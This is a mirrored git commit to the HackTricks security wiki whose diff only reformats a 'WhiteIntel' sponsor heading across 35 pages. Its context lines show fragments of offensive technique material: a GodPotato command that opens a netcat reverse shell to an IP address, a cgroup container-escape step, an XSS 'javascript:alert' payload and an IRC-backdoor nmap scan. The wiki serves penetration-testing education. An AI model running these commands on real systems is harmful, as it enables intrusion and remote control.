mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-14 08:57:55 +00:00
f
This commit is contained in:
parent
3290dc5aa4
commit
fe71d5c6d2
35 changed files with 66 additions and 66 deletions
|
@ -124,7 +124,7 @@ In addition to the above WebSec is also a **committed supporter of HackTricks.**
|
|||
|
||||
{% embed url="https://www.youtube.com/watch?v=Zq2JycGDCPM" %}
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -62,7 +62,7 @@ If an attacker wants to append the string "append" he can:
|
|||
|
||||
You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -180,7 +180,7 @@ f.write(all_bytes)
|
|||
f.close()
|
||||
```
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
# Threat Modeling
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -125,7 +125,7 @@ Now your finished model should look something like this. And this is how you mak
|
|||
This is a free tool from Microsoft that helps in finding threats in the design phase of software projects. It uses the STRIDE methodology and is particularly suitable for those developing on Microsoft's stack.
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -303,7 +303,7 @@ These shortcuts are for the visual settings and sound settings, depending on the
|
|||
* [http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html](http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -79,7 +79,7 @@ In a setup with multiple auth modules, the process follows a strict order. If th
|
|||
* [https://hotpotato.tistory.com/434](https://hotpotato.tistory.com/434)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -320,7 +320,7 @@ chmod +x /tmp/test.pl
|
|||
/tmp/test.pl
|
||||
```
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -85,7 +85,7 @@ chmod a+x /cmd
|
|||
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
|
||||
```
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -148,7 +148,7 @@ If **apple** is indicated in the **partitionID**, you could access it with **`os
|
|||
|
||||
* [**#OBTS v5.0: "Lock Picking the macOS Keychain" - Cody Thomas**](https://www.youtube.com/watch?v=jKE1ZW33JpY)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -80,7 +80,7 @@ cd /tmp; wget https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-
|
|||
```
|
||||
{% endcode %}
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -72,7 +72,7 @@ Android apps can use native libraries, typically written in C or C++, for perfor
|
|||
- [Debug Android Native Libraries Using JEB Decompiler](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -392,7 +392,7 @@ iOS only stores 25 crashes of the same app, so you need to clean that or iOS wil
|
|||
* [https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida](https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -150,7 +150,7 @@ Every MQTT packet contains a fixed header (Figure 02).Figure 02: Fixed Header
|
|||
|
||||
* `port:1883 MQTT`
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -363,7 +363,7 @@ You can use auditd to monitor docker.
|
|||
* [https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc](https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -108,7 +108,7 @@ nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,66
|
|||
* `looking up your hostname`
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -120,7 +120,7 @@ SDP's simplicity and flexibility make it a widely adopted standard for describin
|
|||
|
||||
These protocols play essential roles in **delivering and securing real-time multimedia communication over IP networks**. While RTP and RTCP handle the actual media transmission and quality monitoring, SRTP and ZRTP ensure that the transmitted media is protected against eavesdropping, tampering, and replay attacks.
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -349,7 +349,7 @@ npm start
|
|||
* More researches and write-ups about Electron security in [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking)
|
||||
* [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -298,7 +298,7 @@ HTTP/1.1 401 Unauthorized
|
|||
HTTP/1.1 200 OK
|
||||
```
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -146,7 +146,7 @@ Utilizing decoy requests to obfuscate brute force attempts or mislead rate limit
|
|||
* [https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718](https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -111,7 +111,7 @@ javascript:alert(1)%252f%252f..%252fcss-images
|
|||
|
||||
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -149,7 +149,7 @@ You could definitely use it in a bug **chain** to exploit a **prototype pollutio
|
|||
* [https://portswigger.net/research/server-side-prototype-pollution](https://portswigger.net/research/server-side-prototype-pollution)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -66,7 +66,7 @@ However, there is a check in the web server that **prevents loading files that c
|
|||
|
||||
For more information check the description of the Race Condition and the CTF in [https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -308,7 +308,7 @@ if __name__ == "__main__":
|
|||
|
||||
* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -16,7 +16,7 @@ Other ways to support HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -246,7 +246,7 @@ For **more information**:
|
|||
* [https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd](https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd)
|
||||
* To practice: [https://github.com/yavolo/eventlistener-xss-recon](https://github.com/yavolo/eventlistener-xss-recon)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -206,7 +206,7 @@ JSON Web Token might be used to authenticate an user.
|
|||
* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -12,7 +12,7 @@
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -272,7 +272,7 @@ Check [https://h1pmnh.github.io/post/writeup\_spring\_el\_waf\_bypass/](https://
|
|||
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools)
|
||||
* [https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt](https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -129,7 +129,7 @@ The tool [**recollapse**](https://github.com/0xacb/recollapse) \*\*\*\* allows t
|
|||
* [**https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work**](https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work)
|
||||
* [**https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -80,7 +80,7 @@ BitLocker encryption can potentially be bypassed if the **recovery password** is
|
|||
|
||||
A new BitLocker recovery key can be added through social engineering tactics, convincing a user to execute a command that adds a new recovery key composed of zeros, thereby simplifying the decryption process.
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -206,7 +206,7 @@ This will list the possible contents from the EEPROM as per the signatures found
|
|||
Although, it is necessary to note that it's not always the case that the <b>uboot</b> is unlocked even if it is being used. If the Enter Key doesn't do anything, check for different keys like Space Key, etc. If the bootloader is locked and does not get interrupted, this method would not work. To check if <b>uboot</b> is the bootloader for the device, check the output on the UART Console while booting of the device. It might mention <b>uboot</b> while booting.
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -12,7 +12,7 @@
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -132,7 +132,7 @@ Take a look to [**all the possible token privileges and some definitions on this
|
|||
Learn more about tokens in this tutorials: [https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa](https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa) and [https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -12,7 +12,7 @@
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -155,7 +155,7 @@ Then download [test\_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/maste
|
|||
|
||||
* [https://github.com/ohpe/juicy-potato/blob/master/README.md](https://github.com/ohpe/juicy-potato/blob/master/README.md)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -96,7 +96,7 @@ GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
|
|||
* [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato)
|
||||
* [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
|
Loading…
Reference in a new issue